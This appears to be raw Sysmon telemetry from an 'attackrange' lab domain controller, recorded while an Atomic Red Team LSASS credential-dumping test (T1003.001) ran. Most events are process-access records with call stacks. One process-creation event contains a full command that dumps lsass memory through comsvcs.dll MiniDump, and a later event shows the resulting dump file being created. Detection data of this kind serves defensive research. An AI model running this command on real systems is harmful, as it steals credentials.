21:10:21.906{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025604Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:21.906{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025603Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.812{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025602Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:21.812{4DB9351A-9DDB-60D3-0B00-00000000CF01}6284464C:\Windows\system32\lsass.exe{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000025601Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.796{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=579B55F9AE31E7571085F1B76860A6DF,SHA256=FCEDF25C19B1517CFE97B3D8A9937AA168A5C15F94398D62C85AA4842A5B1651,IMPHASH=00000000000000000000000000000000falsetrue 17141700x800000000000000025600Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:21.796{4DB9351A-A33D-60D3-5706-00000000CF01}3604\PSHost.132689562216293942.3604.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025599Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:21.765{4DB9351A-A33D-60D3-5706-00000000CF01}3604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_yq4pgqgb.cjv.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025598Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.765{4DB9351A-A33D-60D3-5706-00000000CF01}3604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_wm3c2k0v.woz.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025597Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.718{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_wm3c2k0v.woz.ps12021-06-23 21:10:21.718 10341000x800000000000000025596Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:21.687{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025595Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.624{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025594Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:21.624{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025593Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.624{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025592Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:21.624{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025591Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.624{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025590Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:21.624{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025589Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.624{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084872C:\Windows\system32\csrss.exe{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025588Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:21.624{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa
57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025587Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.629{4DB9351A-A33D-60D3-5706-00000000CF01}3604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id 
$env:TEMP\lsass-comsvcs.dmp full} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025586Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.624{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025585Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.624{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025584Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.577{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-err.txtMD5=DB931BA41E34446C293AAF0939AAA36B,SHA256=BD8A3EFD01ADDDBA44F13E6D1B876E7237D8CDAA52EBE24FA7A909A88D5E69CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025583Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.562{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-out.txtMD5=FD4AC0E77CCFAFC17A561D1A73092948,SHA256=A1F14499078731D17CD49D95275251C0EFA33651F03B5B247CEF9E9ED8BF1200,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000025582Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:21.531{4DB9351A-A33A-60D3-5506-00000000CF01}3692ATTACKRANGE\AdministratorC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exeMD5=F13DAB7D9CE88DDC0C80C2B9C5F422B5,SHA256=E2A7A9A803C6A4D2D503BB78A73CD9951E901BEB5FB450A2821EAF740FC48496,IMPHASH=E6F7F291413118F49398761021BAFCF2truetrue 23542300x800000000000000025621Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.812{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA93A6F90F1ADC2F70A7060D8CAF74DA,SHA256=42139ACCF80524E911BBCB2DC1637AEDE54E45239AC9D05606020A15499C8696,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025620Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.781{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C273548CE9E9347F43DF1CECAC551A8F,SHA256=FDD9BAF56DFB72EE9DA39177F642F849079D3277667D25CDF318BA1DA10C3643,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025619Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.643{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=15F52065A1A09A6C88C8BA65A610BB1C,SHA256=A899489CFD841ED9C9F88E97562765C7ED995F48C7DACFE8C8A47475C2D18922,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000025618Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.187{4DB9351A-A33E-60D3-5806-00000000CF01}57846992C:\Windows\System32\rundll32.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ntdll.dll+6cd0a|C:\Windows\System32\KERNEL32.DLL+1cff8|C:\Windows\System32\KERNEL32.DLL+25a87|C:\Windows\SYSTEM32\dbgcore.DLL+15a38|C:\Windows\SYSTEM32\dbgcore.DLL+e3f5|C:\Windows\SYSTEM32\dbgcore.DLL+b027|C:\Windows\SYSTEM32\dbgcore.DLL+5db1|C:\Windows\SYSTEM32\dbgcore.DLL+67d3|C:\windows\System32\comsvcs.dll+3a294|C:\Windows\System32\rundll32.exe+3b0c|C:\Windows\System32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000025617Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.187{4DB9351A-A33E-60D3-5806-00000000CF01}5784C:\Windows\System32\rundll32.exeC:\Users\ADMINI~1\AppData\Local\Temp\lsass-comsvcs.dmp2021-06-23 21:10:22.187 10341000x800000000000000025616Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.187{4DB9351A-A33E-60D3-5806-00000000CF01}57846992C:\Windows\System32\rundll32.exe{4DB9351A-9DDB-60D3-0B00-00000000CF01}628C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\windows\System32\comsvcs.dll+3a17f|C:\Windows\System32\rundll32.exe+3b0c|C:\Windows\System32\rundll32.exe+6097|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025615Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:22.171{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A33E-60D3-5806-00000000CF01}5784C:\Windows\System32\rundll32.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025614Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.171{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A33E-60D3-5806-00000000CF01}5784C:\Windows\System32\rundll32.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000025613Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:22.077{4DB9351A-A33D-60D3-5706-00000000CF01}3604ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025612Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:22.062{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025611Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 